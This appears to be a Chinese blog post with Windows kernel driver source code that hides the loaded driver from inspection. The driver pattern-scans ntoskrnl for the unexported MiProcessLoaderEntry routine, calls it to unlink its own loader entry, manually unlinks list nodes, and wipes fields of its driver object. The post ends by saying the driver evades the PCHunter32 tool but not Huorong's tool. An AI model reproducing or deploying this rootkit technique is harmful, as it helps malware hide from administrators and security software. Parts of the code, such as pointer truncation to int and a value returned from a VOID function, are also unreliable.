参考文章:https://github.com/ZhuHuiBeiShaDiao/NewHideDriverEx
代码
#include<ntddk.h>
typedef struct _LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
union
{
LIST_ENTRY HashLinks;
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
};
union
{
struct
{
ULONG TimeDateStamp;
};
struct
{
PVOID LoadedImports;
};
};
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
//双向链表结构 类型是驱动对象的成员DriverSection 把系统所有模块串接起来
//NTSYSAPI NTSTATUS ZwQuerySystemInformation(
// IN ULONG SystemInformationClass,
// IN OUT PVOID SystemInformation,
// IN ULONG SystemInformationLength,
// OUT PULONG ReturnLength OPTIONAL
//);
typedef VOID(*_MiProcessLoaderEntry)(IN PLDR_DATA_TABLE_ENTRY DataTableEntry, IN LOGICAL Insert);
_MiProcessLoaderEntry g_pfnMiProcessLoaderEntry = NULL;
HANDLE hThread;
VOID DriverUpload(PDRIVER_OBJECT pDriver)
{
g_pfnMiProcessLoaderEntry((PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection, 1);
KdPrint(("卸载的了"));
return STATUS_SUCCESS;
}
VOID threadRun(_In_ PVOID StartContext)
{
//KdPrint(("开始执行1\n"));
/*LARGE_INTEGER times;
times.QuadPart = -30 * 1000 * 1000;
KeDelayExecutionThread(KernelMode, FALSE, ×);*/
PDRIVER_OBJECT pDriver = (PDRIVER_OBJECT)StartContext;
pDriver->DriverSize = 0;
// 破坏驱动对象特征
pDriver->DriverExtension = NULL;
pDriver->DriverStart = NULL;
pDriver->DriverInit = NULL;
pDriver->FastIoDispatch = NULL;
pDriver->DriverStartIo = NULL;
//链表删除结点
PLDR_DATA_TABLE_ENTRY pList = (PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection;
PLDR_DATA_TABLE_ENTRY pCur = pList;
pList = pList->InLoadOrderLinks.Flink;
pList->InLoadOrderLinks.Blink = pCur->InLoadOrderLinks.Blink;
pCur->InLoadOrderLinks.Flink = pList;
pDriver->DriverSection = NULL;
//KdPrint(("g_pfnMiProcessLoaderEntry=%p", g_pfnMiProcessLoaderEntry));
ZwClose(hThread);
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pReg)
{
//定位ntoskrnl基地址
PLDR_DATA_TABLE_ENTRY pLdr = NULL;
PLIST_ENTRY pListEntry = NULL;
PLIST_ENTRY pCurrentListEntry = NULL;
PLDR_DATA_TABLE_ENTRY pCurrentModule = NULL;
pLdr = (PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection;
pListEntry = pLdr->InLoadOrderLinks.Flink;
pCurrentListEntry = pListEntry->Flink;
UNICODE_STRING temp;
RtlInitUnicodeString(&temp, L"ntoskrnl.exe");
int end;
while (pCurrentListEntry != pListEntry) //前后不相等
{
//获取LDR_DATA_TABLE_ENTRY结构
pCurrentModule = CONTAINING_RECORD(pCurrentListEntry, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if (pCurrentModule->BaseDllName.Buffer != 0)
{
if (!RtlCompareUnicodeString(&pCurrentModule->BaseDllName, &temp, TRUE))
{
//DbgPrint("ModuleName = %wZ ModuleBase = %p ModuleEndBase = %p\r\n",
/*&pCurrentModule->BaseDllName,
pCurrentModule->DllBase,
(int)pCurrentModule->DllBase + pCurrentModule->SizeOfImage);*/
g_pfnMiProcessLoaderEntry= pCurrentModule->DllBase;
end=(int)pCurrentModule->DllBase + pCurrentModule->SizeOfImage;
end -=(int)pCurrentModule->DllBase;
// DbgPrint("end = %d ,g_pfnMiProcessLoaderEntry=%p", end, g_pfnMiProcessLoaderEntry);
break;
}
}
pCurrentListEntry = pCurrentListEntry->Flink;
}
char Data[] = { 0x8b,0x03,0x8b,0x4b,0x04,0x89,0x01,0x89,0x48,0x04,0x33,0xc0};
//搜索MiProcessLoaderEntry特征码
char *pOrg = g_pfnMiProcessLoaderEntry;
DbgPrint("pOrg=%p", pOrg);
char *pPare;
int i, j;
for (i = 0; i < end; i++)
{
pPare = pOrg + i;
for (j = 0; j < 11; j++)
{
if (pPare[j] != Data[j])
{
break;
}
}
//如果找到
if (j == 11)
{
//DbgPrint("pPare=%p", pPare- 178);
g_pfnMiProcessLoaderEntry = pPare- 178;
break;
}
}
PsCreateSystemThread(&hThread, GENERIC_ALL, NULL, NULL, NULL, threadRun, pDriver);
g_pfnMiProcessLoaderEntry((PLDR_DATA_TABLE_ENTRY)pDriver->DriverSection, 0);
pDriver->DriverUnload = DriverUpload;
return STATUS_SUCCESS;
}
实测已过PCHunter32 无法过火绒剑